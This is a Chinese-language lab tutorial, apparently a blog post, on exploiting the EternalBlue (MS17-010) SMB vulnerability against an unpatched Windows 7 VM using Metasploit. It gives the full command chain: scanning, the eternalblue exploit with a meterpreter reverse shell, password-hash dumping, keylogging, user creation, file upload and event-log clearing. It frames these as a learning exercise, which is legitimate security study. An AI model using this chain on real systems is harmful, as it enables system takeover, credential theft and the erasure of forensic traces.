• Metaploit-永恒之蓝漏洞利用


    目录

    1. Metaploit介绍
    2. 实验环境
    3. 漏洞利用过程

     Metaploit介绍

      本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

      进入metaploit命令:msfconsole,可以看出下面有总共有六个模块,辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。


     实验环境

    攻击机:192.168.202.132  (Kali安装Metaploit工具)

    靶机:192.168.202.131 (windows7x64未打永恒之蓝补丁且关闭防火墙)


     实战漏洞利用

    1.进入metaploit工具使用命令:msfconsole,可以看出下面有总共有六个模块,不同的模块功能使用的侧重点一样,在进行不同的探测之前使用不同的模块。

    辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。Metaploit的版本号为metasploit v4.17.3-dev

    >>>msfconsole

    2.在进行攻击利用之前,首先确实目标是否开放445端口,该漏洞Ms17-010是否存在,先做好简单的信息收集更能成功利用目标主机。

    nmap探测主机信息

    >>>nmap   -sV   192.168.202.131

    ====>>>445端口开放,目的主机为windows7系统,推测存在ms17-010漏洞

    利用msf的auxiliary模块进行漏洞验证

    >>>search ms17-010

    搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用auxiliary/scanner/smb/smb_ms17_010 进行验证

    >>>use  auxiliary/scanner/smb/smb_ms17_010

    >>>set  rhost  192.168.202.131

    >>>set  rport   445

     

    配置好之后,使用>>>run 探测一下查看结果存在该漏洞

    3.验证存在漏洞之后,就可以利用永恒之蓝漏洞,使用其中的渗透攻击(exploit)模块,对其进行渗透攻击

    a.设置攻击目标、端口、本机

    >>>use  exploit/windows/smb/ms17_010_eternalblue

    b.使用exp进行攻击时,要使用payload作为子弹进行攻击

    >>>set  payload   windows/x64/meterpreter/reverse_tcp

    c.查看具体配置是否完整

    >>>show options 

    d.进行攻击

    >>>run

     

    soga  进去了,看样子差不多可以嘿嘿嘿了*-*

    4.进入shell,获取命令行,可以看到直接获得system权限 

    meterpreter是metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell的链接。

    a.从上面看出已经攻入成功,可以输入:sysinfo查看系统信息

    meterpreter > sysinfo

     

    b.反弹shell

    meterpreter >shell

    meterpreter shell作为渗透模块有很多有用的功能,比如:添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统) 很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

    5.shell利用

    (1).新建用户、获得用户密码

    a.密码为进入hash加密值,可以利用在线解密进行破解

    meterpreter > hashdump

    可以看到用户名,密码,hash解码就可以拿到密码了

    b.进入shell新建用户

    c. 捕捉屏幕:screenhot

     

    到这个路径下查看,可以看到返回的图片

     d.获取按键信息

    开始获取:keyscan_start

    下载内容:keyscan_dump

     

    没有获取到,应该需要在捕获的同时需要进行键盘操作

    e.上传文件

    “upload”命令为上传文件到靶机下(例如黑客上传一个勒索病毒WannaCry),测试上传了一个hack.exe文件到,可以直接执行

    f. 清除事件日志

    执行“clearev”命令,将清除事件日志。

  • 相关阅读:
    jquery判断<inpur type="checkbox" checked>是否被选择
    hibernate多对多的更新问题
    关于getHibernateTemplate().get()方法
    springmvc的@ResponseBody报错
    @RequestBody ajax 415 400
    js判断浏览器的类型,动态调整div布局
    平衡树treap 0基础详解
    P1582 倒水 题解
    vscode入门记
    P5025 [SNOI2017]炸弹 题解
  • 原文地址:https://www.cnblogs.com/wjw-zm/p/11653404.html
Copyright © 2020-2023  润新知